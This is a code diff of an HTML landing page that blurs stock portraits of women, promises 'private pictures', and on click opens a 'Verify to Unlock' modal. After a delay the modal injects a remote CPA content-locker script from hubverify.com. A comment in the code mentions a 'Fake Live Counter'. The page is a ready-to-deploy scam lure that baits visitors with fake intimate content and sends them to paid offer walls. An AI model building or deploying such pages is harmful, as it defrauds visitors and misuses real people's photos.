--- a/index.html
+++ b/index.html
@@ -8,30 +8,18 @@
   <style>
     .blurred { filter: blur(12px); transition: 0.3s ease-in-out; }
     .profile:hover .blurred { filter: blur(6px); }
-    .modal { display: none; }
-    .modal.active { display: flex; }
     .spinner {
       border: 4px solid rgba(255, 255, 255, 0.2);
       border-top: 4px solid #ec4899;
       border-radius: 50%;
-      width: 50px;
-      height: 50px;
+      width: 40px;
+      height: 40px;
       animation: spin 1s linear infinite;
       margin: auto;
     }
     @keyframes spin {
       0% { transform: rotate(0deg); }
       100% { transform: rotate(360deg); }
-    }
-    .overlay-text {
-      position: absolute;
-      bottom: 10px;
-      left: 50%;
-      transform: translateX(-50%);
-      background: rgba(0,0,0,0.6);
-      padding: 4px 10px;
-      border-radius: 6px;
-      font-size: 0.8rem;
     }
   </style>
 </head>
@@ -47,12 +35,11 @@
     </p>
   </div>
 
-  <!-- Fullscreen Modal -->
-  <div id="lockerModal" class="modal fixed inset-0 bg-black bg-opacity-80 backdrop-blur-sm flex items-center justify-center z-50 p-3">
-    <div class="bg-gray-800 rounded-2xl p-6 w-full max-w-md relative shadow-lg">
-      <button onclick="closeModal()" class="absolute top-3 right-3 text-gray-400 hover:text-white text-2xl">&times;</button>
-      <h2 class="text-xl font-bold text-center mb-3">🔒 Verify Your Age to Unlock</h2>
-      <p class="text-sm text-center text-gray-300 mb-4">Complete a quick verification to see all private pictures instantly.</p>
+  <!-- Modal -->
+  <div id="lockerModal" class="hidden fixed inset-0 bg-black bg-opacity-70 backdrop-blur-sm flex items-center justify-center z-50">
+    <div class="bg-gray-800 rounded-2xl p-6 max-w-lg w-full relative shadow-lg">
+      <button onclick="closeModal()" class="absolute top-2 right-2 text-gray-400 hover:text-white text-xl">&times;</button>
+      <h2 class="text-lg font-bold text-center mb-4">🔒 Verify to Unlock</h2>
       
       <!-- Locker Area -->
       <div id="lockerContainer" class="text-center"></div>
@@ -78,7 +65,7 @@
   </div>
 
   <script>
-    // Profile Images
+    // Profile Images Array
     const profiles = [
       "https://randomuser.me/api/portraits/women/65.jpg",
       "https://randomuser.me/api/portraits/women/32.jpg",
@@ -90,45 +77,43 @@
       "https://randomuser.me/api/portraits/women/39.jpg"
     ];
 
-    // Render Profiles
+    // Render Profile Grid
     const grid = document.getElementById("profileGrid");
     profiles.forEach(src => {
       const div = document.createElement("div");
-      div.className = "profile relative cursor-pointer";
+      div.className = "profile relative";
       div.innerHTML = `
         <img src="${src}" class="w-full h-56 object-cover rounded-xl blurred">
-        <span class="overlay-text text-pink-400">Click to Unlock 🔓</span>
+        <div class="absolute inset-0 flex items-center justify-center">
+          <button onclick="openModal()" class="bg-pink-600 px-3 py-1 rounded-lg text-sm">Unlock</button>
+        </div>
       `;
-      div.onclick = () => openModal();
       grid.appendChild(div);
     });
 
     // Modal Functions
     function openModal() {
-      document.getElementById("lockerModal").classList.add("active");
+      document.getElementById("lockerModal").classList.remove("hidden");
       document.getElementById("lockerContainer").innerHTML = `
         <div id="loadingBox">
           <div class="spinner"></div>
           <p class="mt-3 text-sm text-gray-300">Loading verification system...</p>
         </div>
       `;
-      
-      // Remove old script if exists
       let oldScript = document.getElementById("afmlock");
       if (oldScript) oldScript.remove();
 
-      // Load CPA Locker after delay
       setTimeout(() => {
         document.getElementById("lockerContainer").innerHTML = "";
         let s = document.createElement("script");
-        s.src = "https://hubverify.com/cl/clocker.php?id=68bb9ae35b16c"; // আপনার CPA Locker link
+        s.src = "https://hubverify.com/cl/clocker.php?id=YOUR_ID";
         s.id = "afmlock";
         document.body.appendChild(s);
-      }, 2000);
+      }, 3000);
     }
 
     function closeModal() {
-      document.getElementById("lockerModal").classList.remove("active");
+      document.getElementById("lockerModal").classList.add("hidden");
     }
 
     // Fake Live Counter
